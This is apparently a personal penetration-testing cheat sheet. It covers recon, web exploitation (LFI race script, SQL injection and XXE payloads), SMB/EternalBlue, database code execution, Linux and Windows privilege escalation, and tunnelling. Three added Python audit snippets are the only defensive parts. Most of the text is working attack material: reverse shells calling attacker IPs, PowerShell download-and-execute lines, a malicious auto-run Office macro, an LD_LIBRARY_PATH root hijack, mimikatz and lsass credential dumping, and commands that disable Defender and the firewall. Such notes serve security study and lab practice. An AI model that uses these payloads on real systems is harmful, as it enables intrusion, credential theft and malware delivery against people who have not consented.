Host discovery (IP sweep)
fping -g 10.10.110.0/24
for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done
nmap -PE -PM -PP -sn -n 172.16.1.0/24
Windows
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.2.%i | find "Reply"
Port scanning
rustscan -a <ip> -r 1-65535 -t 1500 --tries 3 -- -A
nmap options
nmap -sV --script vuln <ip>
-sV : version of each service
-sC : run the default scripts
-A : detect the host OS and the versions of its services
-p- : scan all ports
sudo nmap -sUV -T4 -F --version-intensity 0 <IP>
Fast UDP Scan
nc -zv -w 1 172.16.2.6 1-9000 2>&1 | grep succeeded
dirsearch
python3 dirsearch.py -u https://target
-w : wordlist
gobuster
gobuster dir -u <url> -w <wordlist> --timeout 30s -x "zip,php,html" -s '200,204,301,302,307,403,500' -e
gobuster vhost -u horizontall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
example
ffuf
ffuf -u http://[website] -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.[domain name]"
-fw : filter by number of words
wordlist
/usr/share/seclists/Discovery/Web-Content/
if /cgi-bin/ is found, scan for the extensions cgi, sh, pl, py
Path traversal
subdomain
take a look
/etc/passwd
/etc/apache2/.htpasswd
log poisoning
/var/log/apache2/error.log
/etc/httpd/logs/access_log
/var/log/apache2/access.log
the GET request can be sent with nc
/var/log/auth.log
inject the payload through the SSH username
../ -> %2e%2e%2f
default session path : /var/lib/php/sessions/sess_{sess_name}
Session upload progress
import grequests

sess_name = 'exploit'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = '<url>'
param = '<LFI parameter>'
code = '''<PHP code>'''

while True:
    # race the upload-progress session file against the LFI read
    req = [grequests.post(base_url,
                          files={'f': "A" * 0xffff},
                          data={'PHP_SESSION_UPLOAD_PROGRESS': f"exploit:<?php {code} ?>"},
                          cookies={'PHPSESSID': sess_name}),
           grequests.get(f"{base_url}?{param}={sess_path}")]
    result = grequests.map(req)
    if "exploit" in result[1].text:
        print(result[1].text)
        break
You can host the payload file yourself (python3 -m http.server 80)
data:text/plain,<?php php_payload?> also works
Check phpinfo() first for banned functions, or use <?php var_dump(ini_get('disable_functions'));
Even banned functions can be bypassed in many ways, and as a last resort this one also works
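Added defender-side example (not part of the original notes): this Python scans Apache access-log lines for the traversal and log-poisoning traffic described above, that is plain, URL-encoded and double-encoded ../, reads of the sensitive paths listed (/etc/passwd, the Apache logs, the PHP session directory), and PHP tags in the request or User-Agent. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (sample data, not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.9 - - [10/Mar/2024:10:00:03 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar/log/apache2/access.log HTTP/1.1" 200 9000 "-" "<?php system($_GET['c']); ?>"
10.0.0.9 - - [10/Mar/2024:10:00:04 +0000] "GET /index.php?page=%252e%252e%252fetc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.7 - - [10/Mar/2024:10:00:05 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Files the notes above name as LFI / log-poisoning targets; a read of these is worth an alert.
SENSITIVE = ("/etc/passwd", "/etc/shadow", ".htpasswd", "/var/log/",
             "/etc/httpd/logs/", "/var/lib/php/sessions/")

def full_unquote(s, rounds=3):
    """URL-decode repeatedly so %252e%252e%252f (double-encoded ../) ends up as ../ too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def analyze_line(line):
    """Return (client_ip, decoded_path, findings) or None when the line looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = full_unquote(m.group("path"))
    ua = full_unquote(m.group("ua"))
    findings = []
    if "../" in path or "..\\" in path:
        findings.append("traversal")
    if any(s in path for s in SENSITIVE):
        findings.append("sensitive-path")
    if "<?php" in path.lower() or "<?php" in ua.lower():
        findings.append("php-tag (log poisoning attempt)")
    return (m.group("ip"), path, findings) if findings else None

def scan_log(text):
    """Run analyze_line over every line and keep only the hits."""
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]
```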
wpscan --url host --enumerate p,t,u --plugins-detection aggressive -t 30
Brute-force the admin account with Hydra
--enumerate ap,at,cb,dbe
ap : all plugins
at : all themes
cb : config backups
dbe : DB export
Tools -> Site Health section
may contain important information (DB), wp-config.php
Password db
SELECT concat(user_login,":",user_pass) FROM wp_users;
'OR 1=1#
universal password (login bypass)
Assuming the second column is echoed back, read the database name
' union select 1,database(),3,4#
read the tables
' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
read the columns
' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='[table_name]' limit 0,1),3,4#
"[table_name]" can also be written as hex (ASCII to hex), a small SQLi trick
read the contents
' union select 1,(select [column_name] from [table_name] limit 0,1),3,4#
Payload All the Things
Apache
Default log : /var/log/apache2/access.log
Default config path : /etc/httpd/conf/httpd.conf
IIS
executes aspx files
the web root is usually under c:\inetpub\wwwroot\
Tomcat
Path
/manager/status/all
/admin/dashboard
Path Bypass
With /..;/
e.g. /manager/status/..;/html/upload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
  <search>&xxe;</search>
</root>
JSP
PHP
ASPX
Adminer (SQLadmin)
wordpress plugin
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php
zip it and upload
enum4linux
enum4linux -a <ip>
quick scan of all information
Scan version
use smb_version in msfconsole
find shared files
nmap -p <port> --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
smbclient //<ip>/<share_path>
smbclient
connect to the smb server
smbclient -L <ip>
-p : specify the port
-U : specify the username
--no-pass or -N : no password
smbmap
Eternal Blue (on Windows, check for MS17-010)
AutoBlue check
generate the exploit shellcode from the contents of the shellcode directory
$ nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin
$ msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin
$ cat evilKernel.bin evilReverse.bin > evilPayload.bin
MS17-010 script
python send_and_execute.py <ip> reverse.exe
CVE-2017-7494 SambaCry , linux/samba/is_known_pipename
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 -Pn <ip>
If you get NT_STATUS_CONNECTION_DISCONNECTED
--option='client min protocol=nt1'
nmap --script ftp-anon -p 21 <ip>
check whether anonymous login is allowed
if so, log in directly with the username anonymous
no password needed
ftp <ip>
FileZilla
Default password location
C:\Program Files\FileZilla Server\FileZilla Server.xml
MySQL service running as root with no password
Injection
User-Defined Function (UDF) Dynamic Library
SHOW VARIABLES LIKE 'plugin_dir';
Write File Method (1)
use mysql;
create table hack(line blob);
insert into hack values(load_file('/tmp/lib_sys_udf.so'));
select * from hack into dumpfile '/{plugin_dir}/lib_sys_udf.so';
Write File Method (2)
xxd -p -c 9999999 lib_sys_udf.so
SET @SHELL=0x{.....}
SHOW VARIABLES LIKE 'plugin_dir';
SELECT BINARY @SHELL INTO DUMPFILE '{PLUGIN_DIR}/meow.so';
create function do_system returns integer soname 'lib_sys_udf.so';
select do_system("{Bash script}");
Connect with either of these (Default port : 1433)
sqsh -S <ip> -U <username> -P <password>
impacket-mssqlclient -p <port> <username>@<IP> -windows-auth
Enable the option, then run cmd to get a reverse shell
1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
1> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://192.168.119.175/reverse.ps1')"
2> go
To run a PowerShell command as base64 it has to be encoded first
echo "..." | iconv -t UTF-16LE | base64 -w 0
powershell -enc <base64>
backup
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup/master.mdf
Or short path C:/PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Backup/master.mdf
Other
Network File System: when a share is mounted on a remote machine and the export is not squashed, the remote side's user identity is kept, so a file you create as root on the remote host is still owned by root when it comes back to the local side
Check /etc/exports
for any directory exported with no_root_squash/no_all_squash
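Added example (not part of the original notes): a Python audit of /etc/exports that parses each client spec and flags the options discussed here, no_root_squash and no_all_squash, together with exports open to any host and whether they are writable. The exports content is a constructed sample.

```python
import re

# Constructed sample /etc/exports (not from a real host).
SAMPLE_EXPORTS = """\
# /etc/exports: NFS file systems being exported.  See exports(5).
/srv/nfs/public   *(rw,sync,no_subtree_check,no_root_squash)
/srv/nfs/home     192.168.1.0/24(rw,sync,root_squash)
/srv/nfs/backup   10.0.0.0/8(rw,sync,no_all_squash) *(ro)
/srv/nfs/safe     10.0.0.5(rw,sync)
"""

# "host(opt,opt)" or a bare host with no option list.
CLIENT_RE = re.compile(r"(?P<host>\S*?)\((?P<opts>[^)]*)\)|(?P<bare>\S+)")

def parse_exports(text):
    """Yield (path, host, [options]) for every client spec in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        parts = line.split(None, 1)
        if len(parts) < 2:                     # empty line or export with no clients
            continue
        path, clients = parts
        for c in CLIENT_RE.finditer(clients):
            if c.group("bare") is not None:
                yield path, c.group("bare"), []
            else:
                opts = [o.strip() for o in c.group("opts").split(",") if o.strip()]
                yield path, c.group("host") or "*", opts   # "(rw)" alone means any host

def audit_exports(text):
    """Return (path, host, issues) for every client spec that weakens uid mapping or access."""
    findings = []
    for path, host, opts in parse_exports(text):
        issues = []
        if "no_root_squash" in opts:
            issues.append("no_root_squash")    # remote root keeps uid 0 on this export
        if "no_all_squash" in opts:
            issues.append("no_all_squash")     # client uids are trusted as-is
        if host == "*" or host.startswith("*."):
            issues.append("any-host")          # no client restriction at all
        if issues and "rw" in opts:
            issues.append("rw")                # writable: root-owned files can be planted through it
        if issues:
            findings.append((path, host, issues))
    return findings
```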
其他詳細
On the attacker side, mount the directory and then build the shell
mkdir /tmp/nfs
mount -t nfs <ip>:/ /tmp/nfs
chown root /tmp/nfs/bash
chmod +s /tmp/nfs/bash
mount -o port=2049 -t nfs localhost:/ /tmp/test
check for mountable NFS folders
NfSpy
once mounted you can spoof the username
Write shell / file
Connect
Set dir
config set dir "/var/www/html"
Set file name
config set dbfilename meow.php
Write web shell
set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
Save
Zone Transfer
dig axfr @[DNS server] [domain name]
nslookup
SERVER <dns server>
(with port 53)
gpg is an encryption/decryption tool
.asc is the public key, .pgp is the encrypted file
gpg2john <.asc> > hash
# brute-force the passphrase
john <hash> --wordlist=<list>
# the following steps need the passphrase
gpg --import <.asc>
gpg --decrypt <.pgp>
meterpreter
use background
to put the session in the background
sessions
shows all running sessions
launch the console
msfconsole
use <exploit>
set payload windows/x64/shell/reverse_tcp
show actions
set <action>
show options
set <OPTION> <value>
exploit
jobs
msfvenom
MSFVenom Reverse Shell Payload Cheatsheet
PowerShell
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Directory
Hydra
hydra -l <username> -P <password-file.txt> <ip> ssh
hydra -l <username> -P <password-file.txt> <ip> http-post-form "<path on website>:username=admin&password=^PASS^:Invalid Password"
John
unshadow passwd.txt shadow.txt > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
ZIP
zip2john <file.zip> > <file.txt>
john <file.txt>
SSH private key
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
ssh2john.py id_rsa > id_rsa.john
ncrack
ncrack -vv --user <user> -P <wordlist> ftp://<ip>
hashcat
hashcat -m 1800 <hash.txt> <wordlist.txt>
-m is the hash type; look it up in the hash type examples
CrackStation
wordlist
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
cewl
crawls a web page for words that could serve as usernames or passwords
attacker: nc -nvlp 1234
target: bash -c 'bash -i >& /dev/tcp/10.17.15.47/1234 0>&1'
from a web shell you may need to urlencode it first (& -> %26)
you can also put it in index.html, serve it over http, and run curl <ip> | bash
running nc 192.168.119.188 1235 -e /bin/bash on the target
also gives a reverse shell
Reverse Shell Cheat Sheet
php-reverse-shell
windows-php-reverse-shell
perl reverse shell
make the shell nicer
python -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
perl -e 'exec "/bin/bash";'
handy tools
rlwrap (lets you use the up/down arrow keys in a reverse shell)
socat
Server : socat file:`tty`,raw,echo=0 tcp-listen:{PORT}
Client : ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{IP}:{PORT}
tsh
configure tsh.h first, then just run make (don't use the sh script)
run ./tsh on the target
and ./tshd on kali
powershell reverse shell
append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> at the end
MSFVenom Reverse Shell Payload Cheatsheet
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.125 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse.exe
How to build a malicious macro
View → Macros, set the "Macros in" document and the name, then Create to write the macro
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.245 LPORT=1234 -f hta-psh -o reverse.hta
split it into chunks
payload = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i + n] + '"')
Write the macro
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
...
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
Str = Str + "QA="
CreateObject("Wscript.Shell").Run Str
End Sub
it must be saved as a .doc
steghide
apt install steghide
steghide extract -sf <file>
exiftool
exiftool <file>
show metadata
Foremost
foremost -i <file>
carve hidden files out
Binwalk
binwalk <file> : displays the data in the file
binwalk -e <file> : displays and extracts the data from the given file
netcat
send: nc <ip> 1234 < file
or cat <file> > /dev/tcp/<ip>/<port>
also works
receive: nc -l -p 1234 > file
webserver
python3 -m http.server 80
when the windows target has smb
impacket-smbserver <sharename> <sharefolder>
on the target: copy <file> \\<ip>\<sharename>
Windows
certutil -urlcache -split -f "http://<ip>/<filename>" <output>
powershell -c (New-Object Net.WebClient).DownloadFile('http://<ip>/<filename>', '<output>')
exec ps1 at remote
powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip>/<filename.ps1>')"
more
Linux Privilege Escalation
sudo -l
check whether a password is required, or for vulnerabilities e.g. CVE-2019-14287, CVE-2021-3156
sudo before version 1.8.28: if sudoers has the rule ALL=(ALL:!root) NOPASSWD: ALL
you can escalate with sudo -u#-1 <cmd>
sudo before version 1.8.26
if LD_PRELOAD or LD_LIBRARY_PATH can be used, run ldd to see which programs runnable as root load shared libraries that could be hijacked
find SUID/SGID files
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
apart from the usual system binaries, look up exploits for anything uncommon
GTFObins
get capabilities
getcap -r / 2>/dev/null
a binary with CAP_SETUID can be used to escalate
/etc/shadow - passwd
if you can read shadow there is a chance to crack it
john --wordlist=./rockyou.txt hash.txt
if it is writable you can also replace the hash
mkpasswd -m sha-512 <newpasswd>
if passwd is writable you can tamper with it too (replace the x between the first two colons)
openssl passwd -1 -salt <user> <pass>
or add a root line with the password hash as the last line
su root
reference
writable
find / -writable -type d 2>/dev/null
crontab
check for scheduled scripts: cat /etc/crontab
they run as root
if one is writable, modify it (write a reverse shell) and wait for root to run it; if it is not called by its full path, look at the PATH and you may be able to intercept it with your own file
pspy is another tool for watching this
sometimes the modification times of things like backups suggest they are produced by a crontab
ls -lah /etc/cron*
grep "CRON" /var/log/cron.log
watch for commands without an absolute path; those can be hijacked by changing PATH
if there is a script that runs as root, copy /bin/bash and chmod u+s it as root
(set SUID) to escalate
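Added example (not part of the original notes): a Python audit of a system crontab that finds jobs whose commands are not given by absolute path, resolves them through the crontab's own PATH, and reports which earlier, writable PATH directories could shadow the real binary. The crontab text, the set of existing files (FAKE_FS) and the writable-directory set (FAKE_WRITABLE) are constructed stand-ins; on a live host swap in os.path.exists and an os.access check.

```python
import re
import shlex

# Constructed /etc/crontab (sample data, not from a real host).
SAMPLE_CRONTAB = """\
PATH=/home/backup/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    tar czf /var/backups/site.tgz /var/www/html
0  3    * * *   root    /usr/local/bin/rotate-logs.sh
*  *    * * *   www-data backup.sh >/dev/null 2>&1
"""
# Constructed stand-ins: files present on the host (use os.path.exists live) and
# directories a low-privileged user can write to (use os.access(d, os.W_OK) live).
FAKE_FS = {"/usr/bin/tar", "/bin/tar", "/usr/bin/run-parts", "/usr/local/bin/backup.sh"}
FAKE_WRITABLE = {"/home/backup/bin"}
SHELL_BUILTINS = {"cd", "export", "exit", "true", "false", "test", "["}

def parse_system_crontab(text):
    """Return (env, [(user, command)]) from /etc/crontab-style text."""
    env, jobs = {"PATH": "/usr/bin:/bin"}, []   # cron's default PATH when none is set
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0] and line[0] not in "*@0123456789":   # VAR=value line
            key, val = line.split("=", 1)
            env[key.strip()] = val.strip().strip('"')
            continue
        fields = line.split(None, 6)            # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return env, jobs

def program_names(cmdline):
    """Yield the program of each simple command ('cd / && run-parts ...' -> run-parts)."""
    for seg in re.split(r"&&|\|\||;|\|", cmdline):
        toks = shlex.split(seg)
        if toks and toks[0] not in SHELL_BUILTINS:
            yield toks[0]

def audit_crontab(text, exists=FAKE_FS.__contains__, writable=FAKE_WRITABLE):
    env, jobs = parse_system_crontab(text)
    findings = []
    for user, cmdline in jobs:
        for prog in program_names(cmdline):
            if "/" in prog:                     # given with a path: no PATH search happens
                continue
            shadowing, resolved = [], None      # dirs searched before the real binary is found
            for d in env["PATH"].split(":"):
                if exists(f"{d}/{prog}"):
                    resolved = f"{d}/{prog}"
                    break
                shadowing.append(d)
            findings.append({"user": user, "prog": prog, "resolved": resolved,
                             "hijackable": [d for d in shadowing if d in writable]})
    return findings
```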
沒藏好的密碼
偷看 user 有沒有曾經打過密碼
檢查有沒有 config 是沒被藏好的,像是 ovpn 之類的
看看 .ssh 裡面有沒有遺漏掉的 key (ssh -i key user@ip)
C Library hijack
use ldd
to see whether a binary uses shared libraries
sudo -l also shows whether LD_PRELOAD / LD_LIBRARY_PATH may be used
if both are possible you can write a fake .so to hijack it
gcc -fPIC -shared -nostartfiles -o <preload.so> <preload.c>
sudo LD_LIBRARY_PATH=. <program>
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* constructor: runs as soon as the library is loaded by the target program */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
Docker escape
if .dockerenv exists in the root directory, the environment is very likely docker and you may need to escape; look for scripts that are clearly run from outside (e.g. backup related)
scan for privilege escalation weaknesses
netstat
netstat -tulpn | grep LISTEN
netstat -ano
ps
Windows Privilege Escalation
Windows Overflow
switching users
CPAU
./cpau.exe -u <username> -p <password> -ex "nc.exe <ip> <port> -e cmd.exe" -LWP
(spawns a reverse shell; -ex can also be followed by an ordinary command)
runas
runas /user:<username> <command>
Winpeas
Mimikatz
github download
vault::cred
get credentials
privilege::debug
+ token::elevate
get privileges
sekurlsa::logonpasswords full
dump passwords
lsadump::dcsync /domain:{DOMAIN NAME} /all /csv
Dump domain user hash (need domain admin)
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
cheatsheet
accesschk.exe: check whether anything is exploitable
accesschk.exe -ucqv <Service_Name> * /accepteula
sc config SSDPSRV binpath= "C:\\Inetpub\\wwwroot\\rootshell.exe"
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\\LocalSystem" password= ""
evil-winrm
evil-winrm -i <ip> -u <user> -H <hash>
smb shell
winexe -U '<username>' //{ip} cmd.exe
impacket-smbexec '<user>:<password>'@<ip>
impacket-psexec '<user>:<password>'@<ip>
pth-winexe -U <username>%NT:LM //<ip> cmd
writable
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
XP/VISTA/2003/2008
AlwaysInstallElevated
check whether it is enabled
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
install a malicious msi
msiexec /quiet /qn /i <bad>.msi
Cached Credentials
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"
same as mimikatz lsadump::cache
dir
like ls; add -ah
to show hidden files
type
like cat
echo %PROCESSOR_ARCHITECTURE%
print the architecture
systeminfo
whoami
md
mkdir
shutdown -r -t 0
net user
list all users
disable the firewall: netsh Advfirewall set allprofiles state off
enable remote desktop (for windows 10)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
disable Defender real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true
disable Defender (check whether defender gets disabled at boot)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
Windows10
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
add a user
net user <username> <password> /add
net localgroup Administrators <username> /add
icacls
list permissions
icacls "<path/filename>"
check what architecture the OS and the process run on
[Environment]::Is64BitOperatingSystem
[Environment]::Is64BitProcess
64-bit powershell
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
OS version
[System.Environment]::OSVersion.Version
reg save hklm\sam c:\sam
reg save hklm\system c:\system
samdump2 system sam > sam.txt
secretsdump.py -sam SAM.hiv -security SECURITY.hiv -system SYSTEM.hiv LOCAL > reg_creds.txt
if reg is unavailable or for convenience, transfer fgdump.exe
over and use it
dump lsass
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <pid> lsass.dmp full
procdump.exe -accepteula -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp
if a path contains spaces and is not quoted, the executable can be hijacked
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
PowerShell History Path
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
User Home, Desktop, Documents, Downloads
C:\Windows\System32\drivers\etc\hosts
https://pentestlab.blog/2017/04/19/stored-credentials/
search files directly for a string: grep -R '<regex>'
wmic service get name,pathname
netstat -ano
Open Port netstat -an | findstr "LISTENING"
tasklist
like ps; /v
: lists the user
kill a process: taskkill /f /PID <pid>
sc
list the selected service: sc qc <service>
list all services: sc queryex type=service state=all
net start
list running services
Shellter
Auto Mode : A
PE Target : {whoami.exe}
Stealth mode : N
Custom : C
Payload : {raw_file}
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f raw > {FILE}.raw
DLL Loader : N
open a reverse tunnel
chisel
port forward
kali: ./chisel server -p 9999 --reverse
target: ./chisel client 10.10.14.135:9999 R:8000:127.0.0.1:8000
proxy
kali: ./chisel server -p 9999 --reverse --socks5
target: ./chisel client 192.168.119.161:9999 R:socks
ssh remote port forwarding
ssh -N -R <attacker ip>:<port>:127.0.0.1:<port> <attacker>@<attacker ip>
ssh dynamic port forwarding
ssh -NfD 9487 <user>@<ip>
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks5 127.0.0.1 9487
then proxychains4 can use the proxy (-q makes it quiet)
SSH
-L port:remote:remote_port : forward a local port to a remote port
-D port : open a SOCKS5 proxy towards the remote side ([local:port] -> [remote])
-R remote_port : open a SOCKS5 proxy towards the local side ([remote:port] -> [local])
-R remote_port:local:port : forward a remote port to a local port
-N : do not run a remote command, just forward
GatewayPorts : decides which interface -R/-L bind to; set it to * or leave the address empty so it listens on 0.0.0.0 by default (without it, binding is only possible on localhost)
toggle the firewall from powershell
netsh advfirewall firewall add rule name="TCP Port 1234" dir=in action=allow protocol=TCP localport=1234
netsh advfirewall firewall delete rule name="TCP Port 1234" protocol=TCP localport=1234
print the firewall rules
netsh advfirewall firewall show rule name=all dir=out type=dynamic
connect to windows RDP from linux
rdesktop
rdesktop <ip>
xfreerdp +drives /u:{username} /p:{password} /v:{ip}:{port}
/size:1800x1000
/u:<domain\username>